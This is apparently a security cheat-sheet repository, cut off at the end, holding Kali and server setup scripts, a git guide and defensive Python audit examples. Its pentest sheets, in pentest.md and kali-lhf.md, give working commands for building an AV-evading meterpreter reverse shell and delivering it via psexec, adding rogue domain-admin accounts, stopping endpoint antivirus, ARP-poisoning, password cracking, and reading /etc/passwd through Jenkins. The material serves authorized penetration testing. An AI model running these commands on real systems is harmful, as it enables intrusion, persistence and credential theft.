├── LICENSE
├── README.md
├── do_prep.sh
├── git.md
├── kali-lhf.md
├── kali_docker_ec2_install.md
├── kali_light_rolling_vbox.sh
├── kali_light_vbox.sh
├── kali_prep.sh
├── pentest.md
└── pre-commit-hooks.sh

/LICENSE:
--------------------------------------------------------------------------------
Copyright (c) 2014, LCI Technology Group, LLC
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice, this
  list of conditions and the following disclaimer.

* Redistributions in binary form must reproduce the above copyright notice,
  this list of conditions and the following disclaimer in the documentation
  and/or other materials provided with the distribution.

* Neither the name of LCI Technology Group, LLC nor the names of its
  contributors may be used to endorse or promote products derived from
  this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
cheat-sheets
============

Various Cheat Sheets related to development and security
--------------------------------------------------------------------------------

/do_prep.sh:
--------------------------------------------------------------------------------
#!/bin/sh

# Copyright (c) 2014, LCI Technology Group, LLC
# All rights reserved.
# See LICENSE file for details.

#-----------------------------------------------------------------------------
#
# Script to prepare a new DigitalOcean Ubuntu or Debian install for first use.
# The script will do the following:
# * Update the software
# * Move the SSH server to a new port
# * Disable password logins for SSH
# * Configure iptables to block all incoming traffic except SSH
# * Configure iptables to run at boot
# * Create a new low-privilege user with sudo access.
# * Copy the authorized key file for root to the new user.
#
# The script assumes you are using an SSH key for root login. If you are
# not, the script may break your access to the server. Also, you really should
# be using SSH keys for all SSH access.
#
# After creating your DigitalOcean server, scp this file to the server, give
# it execute permissions with chmod +x do_prep.sh, and run it as root. When
# the script is complete, reboot the server. Once the server is back online
# you should be able to log in with your low-privileged user account.
#
# Usage:
# ./do_prep.sh username ssh_port
#-----------------------------------------------------------------------------

if [ "$#" -ne 2 ]; then
    echo "Usage: $0 username ssh_port" >&2
    exit 1
fi

# Update the server
echo "Updating the server."
apt-get update
apt-get -y upgrade
apt-get -y autoremove

# Update the SSH configuration: move sshd to the requested port and disable
# password logins. sed -i edits the file in place (no temporary copy needed).
echo "Reconfiguring SSH."
sed -i "s/^Port 22/Port $2/" /etc/ssh/sshd_config
sed -i "s/^#PasswordAuthentication yes/PasswordAuthentication no/" /etc/ssh/sshd_config
service ssh restart

# Add the firewall rules: allow new SSH connections on the chosen port, replies
# to established connections, DNS answers and loopback; drop everything else.
echo "Adding new firewall rules."
iptables -A INPUT -i eth0 -p tcp --dport "$2" -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A INPUT -i eth0 -p tcp -m state --state ESTABLISHED -j ACCEPT
iptables -A INPUT -i eth0 -p udp --sport 53 -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -P INPUT DROP
iptables -P OUTPUT ACCEPT
iptables -P FORWARD DROP

# Configure iptables to start on boot. Overwrite (not append to) the saved
# rule set so rerunning the script does not accumulate duplicate rules.
echo "Configuring firewall to start on boot."
iptables-save > /etc/firewall.conf
echo '#!/bin/sh' > /etc/network/if-up.d/iptables
echo 'iptables-restore < /etc/firewall.conf' >> /etc/network/if-up.d/iptables
chmod +x /etc/network/if-up.d/iptables

# Add a new low-privileged user account with sudo access. The user logs in
# with the same SSH key as root, so root's authorized_keys file is copied over.
echo "Adding new low-privileged user account."
pass=$(head -c 12 /dev/urandom | base64)
useradd -d "/home/$1" -m -G sudo -s /bin/bash "$1"
echo "$1:$pass" | chpasswd
mkdir -m 700 "/home/$1/.ssh"
cp /root/.ssh/authorized_keys "/home/$1/.ssh/authorized_keys"
chmod 600 "/home/$1/.ssh/authorized_keys"
chown -R "$1:$1" "/home/$1/.ssh"

echo "User account $1 created with password $pass."
--------------------------------------------------------------------------------

/git.md:
--------------------------------------------------------------------------------
Git Cheat Sheet
===============
Basic Workflow
--------------
1. Create a new project.
2. Develop code:
   * For small code edits like adding a comment or fixing a typo, I make the changes directly on Master.
   * For features, I create a new branch for that feature and do all the work on that branch.
   * After creating the branch, I add the branch to the upstream server.
   * While developing on the branch I make sure that I am making regular commits and pushing the changes to the upstream server.
   * Once a feature is complete and tested, I merge that branch back into Master and delete the branch.
   * While working on a particular feature, if you need to get changes from Master into your feature branch, then rebase.
3. Once your Master branch is ready for distribution, create a tag with the version number of the distribution. Then create an archive from that tag and distribute that file.
4. Continue to develop code and then tag and distribute that code.


Branches
--------
* Create a new branch: `git checkout -b <branch>`
* Move to a branch: `git checkout <branch>`
* Add a branch to upstream server: `git push --set-upstream origin <branch>`
* Push a branch: `git push -u origin <branch>`
* Merge two branches: `git merge <branch>`
* Delete a branch: `git branch -d <branch>`
* Update a branch with changes in master (Rebase): `git checkout <branch>; git rebase master`


Tags
----
* Create a new tag for version 1.4.0: `git tag -a v1.4.0 -m "Some Message."`
* View all tags: `git tag -n`
* Delete the tag for version 1.4.0: `git tag -d v1.4.0`
* Push the tags: `git push --tags`


Create Archive From Tag
-----------------------
* Create an archive for version 1.4.0 (Option 1): `git archive --prefix=<project>-1.4.0/ -o <project>-1.4.0.tar.gz v1.4.0`
* Create an archive for version 1.4.0 (Option 2): `git archive --format=tar.gz --prefix=<project>-1.4.0/ v1.4.0 > <project>-1.4.0.tar.gz`


View Commits Between Tags
-------------------------
* Commits between two tags: `git log --pretty=format:%s Tag1..Tag2`
* Commits between tag and HEAD: `git log --pretty=format:%s Tag..HEAD`
--------------------------------------------------------------------------------

/kali-lhf.md:
--------------------------------------------------------------------------------
Finding Low Hanging Fruit with Kali
===================================
This cheat sheet was developed to accompany the talk Finding Low Hanging Fruit with Kali, which was presented at [Bsides Nashville](http://bsidesnash.org/) in April 2015.

How to Get Kali
---------------
Kali is available for download at http://kali.org/downloads

Setup Kali for First Use
------------------------
Run `apt-get update` to get the latest package lists.

Run `apt-get upgrade` to install the latest packages.

Some packages may be held back; install those packages using `apt-get dist-upgrade` or `apt-get install <package>`.

Use `apt-get autoremove` to remove packages that are no longer needed.

Setup Metasploit for First Use
------------------------------
Start the Postgres and Metasploit services

    service postgresql start
    service metasploit start

To have the Postgres and Metasploit services start up at boot time.

    update-rc.d postgresql enable
    update-rc.d metasploit enable

Unnecessary Services
--------------------
TCP scan against 10.1.1.4-254

    nmap 10.1.1.4-254

UDP scan of top ten ports against 10.1.1.4-254

    nmap -sU --top-ports 10 10.1.1.4-254

Use the --open switch to show only the open ports.

    nmap --top-ports 10 --open 10.1.1.4-254

Aggressive scan against 10.1.1.4-254 and save to an XML file.

    nmap -A -oX local_network.xml 10.1.1.4-254

Import the scan results into Metasploit

    msfconsole
    db_import local_network.xml
    hosts
    services
    services -p 23

Finding Weak Passwords
----------------------
Look at the wordlists in the wordlists folder

    cd /usr/share/wordlists
    ls
    gunzip rockyou.txt.gz

Brute-force the Telnet service on Metasploitable

    use auxiliary/scanner/telnet/telnet_login
    show options
    set USERNAME msfadmin
    set PASS_FILE /usr/share/wordlists/fasttrack.txt
    set USER_AS_PASS true
    set BLANK_PASSWORDS true
    services -p 23 -R
    run

Exploitable Vulnerabilities
---------------------------
Find heartbleed vulnerabilities

    nmap -p 443 --script=ssl-heartbleed 10.1.1.4-254

Find SMB vulnerabilities

    nmap --script=smb-check-vulns 10.1.1.4-254  # Unsafe warning
    nmap --script=smb-check-vulns --script-args=unsafe=1 10.1.1.4-254

Web-Based Admin Interfaces
--------------------------
Find the Jenkins interface

    nmap -A -p 80,443,5800,8000,8080 10.1.1.4-254

Once we find Jenkins, go to the admin interface and look for the script console.

    proc = ['cat', '/etc/passwd'].execute()
    println proc.in.text

Metasploit also has a module for this.

    use exploit/multi/http/jenkins_script_console
    show options
    set RHOST 10.1.1.7
    set RPORT 8080
    set TARGETURI /
    show targets
    set TARGET 1
    exploit

Metasploit has a lot of exploits for web interfaces

    search /http/

Online Resources
----------------
[Metasploit Unleashed](http://www.offensive-security.com/metasploit-unleashed/Main_Page)
[Nmap Tutorial](http://www.cyberciti.biz/networking/nmap-command-examples-tutorials/)
--------------------------------------------------------------------------------

/kali_docker_ec2_install.md:
--------------------------------------------------------------------------------
Kali Rolling In Docker on EC2
=============================
Create a new Instance
---------------------
1. Build a new Ubuntu 14.04 instance that has t2.medium specs or higher.
2. Configure the root drive to be 40GB.
3. Configure the Security Group and SSH key to match your normal settings.


Install Docker and Kali
-----------------------
1. Copy the docker_kali_setup.sh script (below) to the new instance and run the script. This will update the server, install docker, and download a full Kali docker image. This will take a while.

   `sudo sh docker_kali_setup.sh`

2. When you want to run a Kali command, start a new root shell in docker and execute the command.

   `sudo docker run -t -i kali <command>`

3. If you will be running services, such as metasploit, inside the docker container then you need to start docker with the following command.

   `sudo docker run --net=host -t -i kali /bin/bash`

4. If you would like to save any changes you've made to the container, run the commit command after exiting.

   `sudo docker commit $(sudo docker ps -lq) kali`


Docker Kali Setup Script
------------------------
```
#!/bin/bash

# Apply the latest updates to the box first.
sudo apt-get update
sudo apt-get -y upgrade

# Configure the Docker APT key and repos.
sudo apt-get -y install apt-transport-https ca-certificates
sudo apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D
sudo sh -c 'echo "deb https://apt.dockerproject.org/repo ubuntu-trusty main" > /etc/apt/sources.list.d/docker.list'
sudo apt-get update

# Install and start docker
sudo apt-get -y install linux-image-extra-$(uname -r) apparmor docker-engine
sudo service docker start

# Install Kali Top 10 Metapackage
sudo docker pull kalilinux/kali-linux-docker
sudo docker run kalilinux/kali-linux-docker sh -c 'echo "deb http://archive-2.kali.org/kali kali-rolling main non-free contrib" > /etc/apt/sources.list; apt-get update; apt-get -y install kali-linux-top10'
sudo docker commit $(sudo docker ps -lq) kali:v1
# Also tag the image as kali:latest so the plain "kali" name used in the steps above resolves.
sudo docker tag kali:v1 kali:latest

echo "To access the Kali server run 'sudo docker run -it kali:v1 /bin/bash'."
# Single quotes here: the $(...) must be printed literally, not expanded by this script.
echo 'To save changes to the server run "sudo docker commit $(sudo docker ps -lq) kali:vN", where N is a number.'
echo "To run the saved server use 'sudo docker run -it kali:vN /bin/bash'."
```

Sources
-------
* https://docs.docker.com/engine/installation/linux/ubuntulinux/
* https://www.kali.org/news/official-kali-linux-docker-images/
--------------------------------------------------------------------------------

/kali_light_rolling_vbox.sh:
--------------------------------------------------------------------------------
#!/bin/bash

#----------------------------------------------------------------------------
# The Kali light distro is a minimal install that requires some extra steps
# to run it well in VirtualBox and to install the basic pentesting tools.
# This script will do the following:
#
# * Install the VirtualBox Guest Additions package from the OS.
# * Install the Kali top 10 tools and set a random password on the MySQL
#   database.
# * Configure PostgreSQL to start on boot
# * Initialize the MSF database
#
#-----------------------------------------------------------------------------
echo "Updating packages"
apt-get update
apt-get -q -y upgrade

echo "Installing Kali top 10 tools."
# Preseed the MySQL root password and keep Wireshark's dumpcap non-setuid so
# that the metapackage installs without interactive prompts.
pass=$(head -c 24 /dev/urandom | base64)
echo "mysql-server-5.6 mysql-server/root_password_again password $pass" | debconf-set-selections
echo "mysql-server-5.6 mysql-server/root_password password $pass" | debconf-set-selections
echo "wireshark-common wireshark-common/install-setuid boolean false" | debconf-set-selections
apt-get -q -y install kali-linux-top10 seclists

echo "Configuring Metasploit Database"
/etc/init.d/postgresql start
update-rc.d postgresql enable
msfdb init

echo "Installing VirtualBox Guest Additions"
apt-get -q -y install linux-image-amd64 virtualbox-guest-x11

echo "MySQL Root Password: $pass"
echo "Please reboot."
--------------------------------------------------------------------------------

/kali_light_vbox.sh:
--------------------------------------------------------------------------------
#!/bin/bash

#----------------------------------------------------------------------------
# The Kali light distro is a minimal install that requires some extra steps
# to run it well in VirtualBox and to install the basic pentesting tools.
# This script will do the following:
#
# * Install packages needed to build the VirtualBox Guest Additions
# * Install the VirtualBox Guest Additions
# * Install the Kali top 10 tools and set a random password on the MySQL
#   database.
# * Configure PostgreSQL to start on boot
# * Initialize the MSF database
#
# Prior to running this script, insert the VirtualBox Guest Additions CD
#-----------------------------------------------------------------------------
echo "Updating packages"
apt-get update
apt-get -q -y upgrade

echo "Installing build tools and headers."
apt-get -q -y install build-essential linux-headers-$(uname -r)

echo "Installing the VirtualBox Guest Additions."
mount /media/cdrom
if [ ! -f "/media/cdrom/VBoxLinuxAdditions.run" ]; then
    echo "VirtualBox Guest Additions CD not mounted, skipping."
else
    /bin/bash /media/cdrom/VBoxLinuxAdditions.run
    umount /media/cdrom
    eject /media/cdrom
fi

echo "Installing Kali top 10 tools."
# Preseed the MySQL root password and keep Wireshark's dumpcap non-setuid so
# that the metapackage installs without interactive prompts.
pass=$(head -c 24 /dev/urandom | base64)
echo "mysql-server-5.5 mysql-server/root_password_again password $pass" | debconf-set-selections
echo "mysql-server-5.5 mysql-server/root_password password $pass" | debconf-set-selections
echo "wireshark-common wireshark-common/install-setuid boolean false" | debconf-set-selections
apt-get -q -y install kali-linux-top10 seclists

echo "Configuring Metasploit Database"
/etc/init.d/postgresql start
update-rc.d postgresql enable
msfdb init

echo "MySQL Root Password: $pass"
echo "Please reboot."
--------------------------------------------------------------------------------

/kali_prep.sh:
--------------------------------------------------------------------------------
#!/bin/sh

# Copyright (c) 2015, LCI Technology Group, LLC
# All rights reserved.
# See LICENSE file for details.

#-----------------------------------------------------------------------------
#
# Script to prepare a new Kali install for first use.
# The script will do the following:
# * Update the software
# * Start the postgresql and metasploit services
# * Configure the postgresql and metasploit services to start on boot
#
# Usage:
# ./kali_prep.sh
#-----------------------------------------------------------------------------

# Update the server
echo "Updating the server."
apt-get update
apt-get -y upgrade
apt-get -y autoremove

# Start the Postgres and Metasploit services
echo "Starting services."
service postgresql start
service metasploit start

# Configure services to start on boot.
echo "Configure services to start on boot."
update-rc.d postgresql enable
update-rc.d metasploit enable

--------------------------------------------------------------------------------

/pentest.md:
--------------------------------------------------------------------------------
Pentesting Cheat Sheet
======================
These are various tips and tricks I have found useful on my pentest engagements. Most of these can be found using Google but I decided to put them in a central location to make them easily accessible. Hope they are as helpful to you as they are to me.

Mounting Shares
---------------
To mount an SMB share using a null session do one of the following depending on
the OS you are using.

    Windows> net use x: \\server\share "" /u:
    Linux> mount -t cifs //server/share -o username=,password= /mnt/point

To mount an NFS share on Linux use.

    mount -t nfs server:/share /mnt/point

Administrative Accounts
-----------------------
Add a new Windows domain admin account.

    net user username password /ADD /DOMAIN
    net group "Domain Admins" username /ADD /DOMAIN

Add a new Windows local admin account.

    net user username password /ADD
    net localgroup Administrators username /ADD

Add a new Linux account and put it in the wheel group.

    useradd -G wheel username && echo "username:newpass" | chpasswd

Meterpreter Shell Error
-----------------------
If you get the error, "stdapi_sys_process_execute: Operation failed: 1314",
while trying to drop to a shell in meterpreter, try the command below. This is
a known bug in meterpreter.

    execute -f cmd.exe -c -i -H

Metasploit: Custom Psexec Executable
------------------------------------
The first thing we need to do is generate a custom executable to use with Meterpreter.

    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe

Next we need to set up a multi handler to listen for connections.

    msf > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(handler) > set LHOST 192.168.0.1
    LHOST => 192.168.0.1
    msf exploit(handler) > set LPORT 4445
    LPORT => 4445
    [*] Started reverse handler on 192.168.0.1:4445
    [*] Starting the payload handler...

In another msfconsole session we need to configure the psexec exploit module to use our custom executable.

    msf > use exploit/windows/smb/psexec
    msf exploit(psexec) > set RHOST 192.168.0.2
    RHOST => 192.168.0.2
    msf exploit(psexec) > set SMBUser user
    SMBUser => user
    msf exploit(psexec) > set SMBPass pass
    SMBPass => pass
    msf exploit(psexec) > set EXE::Custom /path/to/custom.exe
    EXE::Custom => /path/to/custom.exe

Finally, we need to run the exploit. If everything worked, you should see a new meterpreter session open in multi/handler.

    msf exploit(psexec) > exploit

Disable Antivirus
-----------------
This command will disable Symantec Endpoint Protection. I find it useful when
I have a basic shell on a box and want to upgrade to Meterpreter but Symantec
stops me.

    c:\program files\symantec\symantec endpoint protection\smc -stop

Use Ettercap to Sniff Traffic
-----------------------------
Ettercap allows us to do ARP poisoning and sniff plaintext passwords.

    ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap

Cracking WPA/WPA2 PSK
---------------------
Use JtR to generate candidate passwords for aircrack-ng

    john --incremental:all --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap

Use Hashcat to generate candidate passwords for aircrack-ng

    ./hashcat-cli32.bin wordlist -r rules/d3ad0ne.rule --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap

Cracking IPSec Aggressive Mode Pre-Shared Key
---------------------------------------------
If you've never done this, read these first.
http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide
http://carnal0wnage.attackresearch.com/2011/12/aggressive-mode-vpn-ike-scan-psk-crack.html

To find aggressive mode VPNs use ike-scan.

    ike-scan -A 192.168.1.0/24

If the default transforms don't work, use the generate-transforms.sh script from the user guide above.

    generate-transforms.sh | xargs --max-lines=8 ike-scan 10.0.0.0/24

If you find a SonicWALL VPN using aggressive mode it will require a group id; the default group id is GroupVPN.

    ike-scan 192.168.1.1 -A -id GroupVPN

Use the -P argument to save the handshake to a file, which can be used by psk-crack.

    ike-scan 192.168.1.1 -A -Ppsk_192.168.1.1.txt

Use a dictionary to crack the pre-shared key.

    psk-crack -d /path/to/dictionary psk_192.168.1.1.txt

Basic Scanning with Nmap
------------------------
Discovery Scans:

    nmap -v -n -PE <targets>
    nmap -v -n -PE -PO -PM -PP <targets>
    nmap -v -n -PS21-23,25,53,80,443,3389 -PO -PE -PM -PP <targets>

Detailed TCP Scans:

    nmap -v -sS -A --top-ports 10 -oA filename <targets>
    nmap -v -sS -A -F -oA filename <targets>
    nmap -v -sS -A -oA filename <targets>
    nmap -v -sS -A -p 1-65535 -oA filename <targets>

Detailed UDP Scans:

    nmap -v -sU -A --top-ports 10 -oA filename <targets>
    nmap -v -sU -A -F -oA filename <targets>
    nmap -v -sU -A -oA filename <targets>
    nmap -v -sU -A -p 1-65535 -oA filename <targets>


Create an IP List with Nmap
---------------------------
I find this particularly useful for tools or scripts that operate on a newline-delimited list of IP addresses. I can use the simple Nmap syntax to create a file with the list of appropriate IPs.

    nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt

Crack Passwords with John and Korelogic Rules
---------------------------------------------
At one point Korelogic released a set of John the Ripper rules in a john.conf file. This bash one-liner grabs each ruleset and runs JtR with the specified ruleset.

    for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} -w:<wordlist> <hashfile>; done

Unquoted Service Paths
----------------------
Identify unquoted service paths that may be useful for privilege escalation.

    wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

https://www.commonexploits.com/unquoted-service-paths/
--------------------------------------------------------------------------------

/pre-commit-hooks.sh:
--------------------------------------------------------------------------------
#!/bin/sh

# List (without rewriting) the Go files whose formatting differs from gofmt's
# and refuse the commit until the developer has formatted them.
echo "Checking formatting..."
if [ "$(gofmt -l . | wc -l)" -gt 0 ]; then
    echo "Please run go fmt" >&2
    exit 1
fi

# Refuse the commit if the tests of any package fail.
echo "Checking tests..."
go test ./... || exit 1
--------------------------------------------------------------------------------
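An added example (not code from the cheat-sheets repo) that checks the two sshd_config changes do_prep.sh makes, using sshd's own rules: the first occurrence of a keyword wins, and directives under a `Match` block do not set the global value. The sample configs are constructed; `STOCK`, `HARDENED` and `TRAP` are names chosen here.

```python
"""Audit an sshd_config for the settings do_prep.sh applies.

Added example, not part of the cheat-sheets repo. Assumed sshd semantics:
keywords are case-insensitive, the FIRST occurrence of a keyword wins,
'#' starts a comment, and directives after a 'Match' line are conditional,
so they do not count for the global setting.
"""
from typing import Dict, List


def parse_sshd_config(text: str) -> Dict[str, List[str]]:
    """Map lower-cased keyword -> values in file order, global section only."""
    conf: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        # sshd accepts "Key value" and "Key=value"; normalise the separator.
        parts = line.replace("=", " ", 1).split(None, 1)
        key = parts[0].lower()
        if key == "match":
            break  # everything below applies only to matching users/hosts
        conf.setdefault(key, []).append(parts[1].strip() if len(parts) > 1 else "")
    return conf


def effective(conf: Dict[str, List[str]], key: str, default: str) -> str:
    """The value sshd uses: the first occurrence, or the daemon default."""
    values = conf.get(key.lower())
    return values[0] if values else default


def audit(text: str, expected_port: int) -> List[str]:
    """Return findings (empty list = config matches what do_prep.sh intends)."""
    conf = parse_sshd_config(text)
    findings = []
    if effective(conf, "PasswordAuthentication", "yes").lower() != "no":
        findings.append("password logins are still enabled")
    ports = conf.get("port", ["22"])  # sshd listens on every Port line given
    if str(expected_port) not in ports:
        findings.append(f"sshd does not listen on port {expected_port}")
    if "22" in ports and expected_port != 22:
        findings.append("sshd still listens on port 22")
    return findings


# Constructed sample configs: a stock file, and the same file after do_prep.sh.
STOCK = """# Package generated configuration file
Port 22
Protocol 2
#PasswordAuthentication yes
UsePAM yes
"""
HARDENED = STOCK.replace("Port 22", "Port 2222").replace(
    "#PasswordAuthentication yes", "PasswordAuthentication no")
# Constructed trap: the only "no" sits under a Match block while the global
# (first) value is still "yes", so the host accepts passwords from everyone.
# The script's sed would also miss this file: it only rewrites the commented line.
TRAP = "Port 2222\nPasswordAuthentication yes\nMatch User ops\n  PasswordAuthentication no\n"

if __name__ == "__main__":
    for label, cfg in (("stock", STOCK), ("hardened", HARDENED), ("trap", TRAP)):
        print(label, audit(cfg, 2222) or "OK")
```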
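For the kali-lhf.md "Unnecessary Services" section, an added example (not from the cheat-sheets repo) that reads the `nmap -oX` file directly and answers the same question as `services -p 23` in msfconsole, so an admin can list hosts still exposing telnet and other cleartext services without importing into Metasploit. The XML below is constructed in nmap's output shape, not a real scan; `UNNECESSARY` is a port list chosen here.

```python
"""Pull open ports out of nmap -oX output without importing it into Metasploit.

Added example, not part of the cheat-sheets repo. The sample XML is
constructed in the shape nmap writes (host/status/address/ports/port/state/
service); it is not a real scan.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List, NamedTuple


class OpenService(NamedTuple):
    host: str
    proto: str
    port: int
    name: str      # nmap's service guess, e.g. "telnet"
    product: str   # version-detection string; empty without -A / -sV


def parse_open_services(xml_text: str) -> List[OpenService]:
    """Every open port on every host nmap reported as up."""
    found: List[OpenService] = []
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if status is not None and status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not exposure
            svc = port.find("service")
            name = product = ""
            if svc is not None:
                name = svc.get("name", "")
                product = " ".join(v for v in (svc.get("product"), svc.get("version")) if v)
            found.append(OpenService(addr.get("addr"), port.get("protocol"),
                                     int(port.get("portid")), name, product))
    return found


def hosts_with_port(xml_text: str, portid: int, proto: str = "tcp") -> List[str]:
    """Equivalent of `services -p <port>` in msfconsole: hosts exposing a port."""
    return sorted({s.host for s in parse_open_services(xml_text)
                   if s.port == portid and s.proto == proto})


# Cleartext/legacy services that should not be listening on a modern network.
UNNECESSARY = {21: "ftp", 23: "telnet", 512: "exec", 513: "login", 514: "shell"}


def unnecessary_services(xml_text: str) -> Dict[str, List[str]]:
    """host -> list of 'port/name' for the unnecessary services it exposes."""
    report: Dict[str, List[str]] = {}
    for s in parse_open_services(xml_text):
        if s.proto == "tcp" and s.port in UNNECESSARY:
            report.setdefault(s.host, []).append(f"{s.port}/{UNNECESSARY[s.port]}")
    return report


SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -A -oX local_network.xml 10.1.1.4-254">
<host><status state="up"/><address addr="10.1.1.7" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="4.7p1"/></port>
<port protocol="tcp" portid="23"><state state="open"/><service name="telnet" product="Linux telnetd"/></port>
</ports></host>
<host><status state="up"/><address addr="10.1.1.9" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="23"><state state="closed"/><service name="telnet"/></port>
<port protocol="tcp" portid="443"><state state="open"/><service name="https" product="Apache httpd"/></port>
</ports></host>
<host><status state="down"/><address addr="10.1.1.10" addrtype="ipv4"/></host>
</nmaprun>"""

if __name__ == "__main__":
    print(hosts_with_port(SAMPLE_XML, 23))   # hosts still running telnet
    print(unnecessary_services(SAMPLE_XML))
```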
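For the pentest.md "Create an IP List with Nmap" section, an added example (not from the cheat-sheets repo) that expands nmap's target syntax itself, so the newline-delimited list can be built offline and fed to the same tools; it covers the octet-range form from the one-liner as well as the `*` wildcard and CIDR, which nmap also accepts. Function names are chosen here.

```python
"""Expand nmap's target syntax into a newline-delimited IP list, offline.

Added example, not part of the cheat-sheets repo. It reproduces what the
`nmap -sL -n ... | grep | cut` one-liner produces, for the octet-range form
(192.168.1.1-100,102-254), the '*' wildcard and CIDR, without running nmap.
"""
import ipaddress
import itertools
from typing import Iterable, List


def _expand_octet(spec: str) -> List[int]:
    """'5' -> [5]; '1-3' -> [1,2,3]; '1-3,7' -> [1,2,3,7]; '*' -> 0..255."""
    if spec == "*":
        return list(range(256))
    values: List[int] = []
    for part in spec.split(","):
        lo, dash, hi = part.partition("-")
        lo_i = int(lo) if lo else 0                          # nmap: '-5' means 0-5
        hi_i = int(hi) if hi else (255 if dash else lo_i)    # '5-' means 5-255
        if not 0 <= lo_i <= hi_i <= 255:
            raise ValueError(f"bad octet range {part!r}")
        values.extend(range(lo_i, hi_i + 1))
    return values


def expand_target(target: str) -> List[str]:
    """All IPv4 addresses one nmap target specification covers."""
    if "/" in target:
        # nmap -sL lists network and broadcast addresses too, so iterate all.
        return [str(ip) for ip in ipaddress.ip_network(target, strict=False)]
    octets = target.split(".")
    if len(octets) != 4:
        raise ValueError(f"not an IPv4 target spec: {target!r}")
    return [".".join(map(str, combo))
            for combo in itertools.product(*(_expand_octet(o) for o in octets))]


def ip_list(targets: Iterable[str]) -> str:
    """Newline-delimited, de-duplicated list in first-seen order, ready for
    tools that take one address per line."""
    seen = set()
    out: List[str] = []
    for spec in targets:
        for ip in expand_target(spec):
            if ip not in seen:
                seen.add(ip)
                out.append(ip)
    return "\n".join(out) + ("\n" if out else "")


if __name__ == "__main__":
    # Same target as the cheat sheet's one-liner: 253 addresses (no .101).
    print(ip_list(["192.168.1.1-100,102-254"]), end="")
```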
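For the pentest.md "Unquoted Service Paths" section, an added example (not from the cheat-sheets repo) that applies the same filters as the wmic/findstr one-liner (auto-start, outside C:\Windows, no quotes) to service records, then checks whether the executable part of the path actually contains a space, and produces the quoted path an administrator would set to fix it. The records are constructed, not real wmic output; the names are chosen here.

```python
"""Flag auto-start Windows services with unquoted, space-containing paths.

Added example, not part of the cheat-sheets repo. Input records are
constructed in the column order of the cheat sheet's wmic query; they are
not real wmic output.
"""
import re
from typing import List, NamedTuple


class Service(NamedTuple):
    name: str
    display_name: str
    path_name: str
    start_mode: str


def executable_path(path_name: str) -> str:
    """The executable portion of a service PathName, arguments stripped."""
    p = path_name.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        return p[1:end] if end > 0 else p[1:]
    # Unquoted: the exe ends at the first ".exe" followed by a space or EOL.
    m = re.match(r"(.*?\.exe)(?=\s|$)", p, re.IGNORECASE)
    return m.group(1) if m else p


def is_unquoted_space_path(path_name: str) -> bool:
    """True when the service manager would try C:\\Program.exe,
    C:\\Program Files\\Vendor.exe, ... before the real binary."""
    p = path_name.strip()
    return not p.startswith('"') and " " in executable_path(p)


def find_unquoted_services(services: List[Service]) -> List[str]:
    """Names of auto-start services outside the Windows directory whose
    executable path is unquoted and contains a space."""
    hits = []
    for s in services:
        if s.start_mode.lower() != "auto":
            continue  # same filter as findstr /i "auto"
        if s.path_name.strip().lower().startswith("c:\\windows\\"):
            continue  # same exclusion as findstr /v "c:\windows\\"
        if is_unquoted_space_path(s.path_name):
            hits.append(s.name)
    return hits


def quoted_path_name(path_name: str) -> str:
    """The remediation: the same PathName with the executable wrapped in quotes."""
    p = path_name.strip()
    if p.startswith('"'):
        return p
    exe = executable_path(p)
    return f'"{exe}"{p[len(exe):]}'


# Constructed records (Name, DisplayName, PathName, StartMode).
SAMPLE = [
    Service("VendorSvc", "Vendor Agent", r"C:\Program Files\Vendor App\agent.exe -k run", "Auto"),
    Service("GoodSvc", "Good Agent", r'"C:\Program Files\Vendor App\agent.exe" -k run', "Auto"),
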